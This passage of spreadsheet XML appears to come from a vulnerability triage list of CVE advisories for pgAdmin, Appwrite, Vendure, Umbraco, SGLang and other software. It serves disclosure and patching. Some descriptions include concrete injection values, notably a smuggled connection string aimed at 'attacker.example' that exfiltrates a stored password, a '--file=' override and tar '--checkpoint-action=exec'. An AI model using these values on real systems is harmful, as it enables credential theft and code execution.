        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr"/>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S87" s="5" t="inlineStr">
        <is>
          <t>HUBzero CMS through 2.2.32 contains a path traversal vulnerability in project file upload handlers that allows authenticated project members to write arbitrary files outside the project repository. Attackers can supply traversal sequences in upload parameters to write files to attacker-chosen paths with web server privileges, potentially enabling code execution.</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92970</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92972</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr"/>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <t>SGLang through 0.5.19 in prefill/decode disaggregation mode contains an unauthenticated PUT /route endpoint on the prefill bootstrap service that allows attackers to poison the KV transfer routing table. Attackers can supply arbitrary rank_ip and rank_port values to redirect decode workers to attacker-controlled endpoints, causing denial of service or disclosure of KV transfer metadata including session identifiers and tensor-parallel topology parameters.</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92972</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52836</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr"/>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S89" s="5" t="inlineStr">
        <is>
          <t>OpenDDS is an open source C++ implementation of the Object Management Group (OMG) Data Distribution Service (DDS). Prior to 3.34.0, a network attacker can crash a reachable OpenDDS participant by sending a malformed RTPS UDP submessage whose crafted length or sequence-number state causes dds/DCPS/transport/rtps_udp/RtpsUdpReceiveStrategy.cpp in RtpsUdpReceiveStrategy::handle_input() to advance ACE_Message_Block::rd_ptr() beyond valid data. The parser can then call dds/DCPS/transport/rtps_udp/RtpsSampleHeader.cpp in RtpsSampleHeader::init(), which dereferences the invalid read pointer without first validating it against wr_ptr() or ensuring that a complete submessage header remains. The resulting SIGSEGV occurs in the receive thread, terminates the DDS process, and destroys the DDS entities hosted by that participant. No authentication, prior protocol state, or victim interaction is required. This issue is fixed in version 3.34.0.</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52836</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54343</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S90" s="5" t="inlineStr">
        <is>
          <t>Frappe Learning Management System (LMS) is a learning system that helps users structure their content. Prior to version 2.52.1, a remote attacker can request a traversal path handled by SCORMRenderer.render in lms/page_renderers.py. The renderer constructs and opens a server-side path without first confirming that its real path remains within public/scorm, allowing files outside the SCORM directory to be read when they are accessible to the server process. This issue is fixed in version 2.52.1.</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54343</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54571</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr"/>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S91" s="5" t="inlineStr">
        <is>
          <t>ESPAsyncWebServer is an asynchronous HTTP and WebSocket server library for ESP32, ESP8266, RP2040 and RP2350. Prior to 3.11.1, the multipart/form-data parser in src/WebRequest.cpp stores _boundaryPosition as an 8-bit value while _parseMultipartPostByte processes the boundary. A remote request containing an exactly 256-byte multipart boundary wraps _boundaryPosition from 255 to zero, prevents the boundary parsing loop from terminating, consumes excessive CPU, and triggers a FreeRTOS watchdog reset on affected ESP32 or ESP8266 devices. This issue is fixed in version 3.11.1.</t>
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54571</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63459</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr">
        <is>
          <t>npm:@vendure/dashboard</t>
        </is>
      </c>
      <c r="M92" s="5" t="inlineStr">
        <is>
          <t>3.6.5</t>
        </is>
      </c>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S92" s="5" t="inlineStr">
        <is>
          <t>Vendure is an open-source headless commerce platform. Prior to 3.6.5, RichTextDescriptionCell in packages/dashboard/src/lib/components/shared/table-cell/order-table-cell-components.tsx attempts to strip markup by assigning an administrator-controlled description to a live element's innerHTML and then reading textContent. Active resource markup can execute an event handler during the innerHTML assignment before textContent is read. A lower-privilege administrator can store such markup in descriptions rendered by the Products list, Collections list, Promotions list, Payment Methods list, or Shipping Methods list, and script executes when another administrator views the affected row. This stored cross-site scripting can compromise the viewing administrator's session and enable cross-privilege or cross-channel administrative actions. This issue is fixed in version 3.6.5.</t>
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63459</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69197</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr">
        <is>
          <t>nuget:Umbraco.Cms</t>
        </is>
      </c>
      <c r="M93" s="5" t="inlineStr">
        <is>
          <t>13.15.1, 17.5.3, 18.0.2</t>
        </is>
      </c>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-862</t>
        </is>
      </c>
      <c r="S93" s="5" t="inlineStr">
        <is>
          <t>Umbraco is an ASP.NET CMS. Prior to 13.15.1, 17.5.3, and 18.0.2, the Content Delivery API applies member and Public Access checks to the directly requested node but not to referenced nodes serialized through Content Picker or Multi-Node Tree Picker properties, including pickers nested in Block List, Block Grid, or Rich Text Editor blocks. When DeliveryApi:PublicAccess is enabled, an anonymous caller can retrieve a protected node's name, route, and id through an unprotected referencing node and use ?expand to retrieve full property values. When the Delivery API is instead gated by the organization-wide API key, a key holder can still bypass per-node Public Access through the same expansion path. The same RequestContextOutputExpansionStrategyV2 and ElementOnlyOutputExpansionStrategy path also bypasses allowed or disallowed content-type alias restrictions for referenced content. Direct requests for the protected node still return 401, and no integrity or availability impact is established. This issue is fixed in versions 13.15.1, 17.5.3, and 18.0.2.</t>
        </is>
      </c>
      <c r="T93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69197</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77615</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S94" s="5" t="inlineStr">
        <is>
          <t>Paella Player is a set of libraries to create a multi stream video player. Prior to Paulla Player 2.12.11 (as used in Opencast prior to 19.7 and 20.2), there is a potential XSS attack though closed captions cue text. This vulnerability is fixed in 2.12.11.</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77615</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86864</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>f86ef6dc-4d3a-42ad-8f28-e6d5547a5007</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="inlineStr"/>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-88</t>
        </is>
      </c>
      <c r="S95" s="5" t="inlineStr">
        <is>
          <t>pgAdmin 4's Backup tool appended the client-supplied 'database' field from the /backup/job/&lt;sid&gt;/object request to the pg_dump argument vector as a bare trailing positional argument, without validation. Because pg_dump parses its options with getopt_long, which permutes arguments, a value beginning with a dash was interpreted as an option rather than as a database name. A value such as --file=/absolute/path therefore overrode the storage-confined --file that pgAdmin had constructed earlier, causing pg_dump to write its output anywhere the pgAdmin process could write, outside the user's File Manager storage directory. This yields arbitrary file creation and overwrite as the operating-system account running pgAdmin, which can destroy pgAdmin's own configuration database and, depending on the target chosen, be escalated further.
The same field additionally permitted connection-string injection. libpq expands a database name containing an equals sign into a full connection string, and keywords embedded there override the --host and --port that pgAdmin passes, so a value such as 'host=attacker.example port=5432 dbname=x' redirected pg_dump to a server of the attacker's choosing. Because pgAdmin exports the decrypted stored database password in the PGPASSWORD environment variable before executing the utility, the redirected connection carries that credential to the attacker-nominated endpoint. Both behaviours are reachable by any authenticated user holding the tools_backup permission, which is granted to the default User role.
The fix stops passing the database name through the argument vector altogether and supplies it in the PGDATABASE environment variable, which libpq treats as a literal database name and never expands as a connection string. This matches the approach already used by the Import/Export tool. Regression tests assert that the database name is absent from the constructed argument vector and that PGDATABASE carries the exact requested value.
This issue affects pgAdmin 4: from the introduction of the trailing positional database argument in the Backup tool before 9.18.</t>
        </is>
      </c>
      <c r="T95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86864</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89036</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="inlineStr"/>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S96" s="5" t="inlineStr">
        <is>
          <t>Appwrite before 2.0.0 contains an argument injection vulnerability that allows authenticated users with functions.write or sites.write permissions to execute arbitrary commands by injecting TAB characters into the providerRootDirectory parameter used to construct GNU tar commands. The application uses escapeshellcmd instead of escapeshellarg and fails to quote the parameter, allowing TAB characters to survive sanitization and be interpreted as argument separators, enabling injection of arbitrary GNU tar arguments such as --checkpoint-action=exec to achieve remote code execution as the builds worker process user.</t>
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89036</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89418</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@google.com</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S97" s="5" t="inlineStr">
        <is>
          <t>google-protobuf contains an unbounded recursion when parsing unknown protobuf group fields. An attacker can send a small crafted payload of deeply nested START_GROUP wire bytes to any Node.js service that calls the generated deserializeBinary() API, causing a RangeError: Maximum call stack size exceeded and crashing the process. No authentication or prior knowledge of the schema is required.</t>
        </is>
      </c>
      <c r="T97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89418</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92971</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr"/>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S98" s="5" t="inlineStr">
        <is>
          <t>InternLM LMDeploy through 0.17.0 contains a reachable assertion vulnerability in the DistServe decode migration loop that allows unauthenticated attackers to terminate the inference engine. Attackers can submit a migration_request with an empty remote_block_ids list to trigger an AssertionError that crashes the engine loop and causes subsequent inference requests to fail.</t>
        </is>
      </c>
      <c r="T98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92971</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92987</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="inlineStr"/>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="S99" s="5" t="inlineStr">
        <is>
          <t>roxmltree through 0.21.1 performs quadratic-time attribute and namespace validation during XML parsing without limits on attribute count. Attackers can craft XML documents with tens of thousands of attributes on a single element to consume excessive CPU time and cause denial of service.</t>
        </is>
      </c>
      <c r="T99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92987</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19477</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>security@ni.com</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="inlineStr"/>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr"/>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S100" s="5" t="inlineStr">
        <is>
          <t>There
is stack-based buffer overflow vulnerability recently discovered in MCC Universal Library for Linux (uldaq).  This may result in information disclosure or arbitrary code
execution. This vulnerability affects MCC Universal Library for Linux (uldaq) v1.2.1
and prior versions.</t>
        </is>
      </c>
      <c r="T100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19477</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68791</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="inlineStr"/>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr"/>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q101" s="5" t="inlineStr"/>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S101" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Azure Machine Learning allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T101" s="6" t="inlineStr">
        <is>
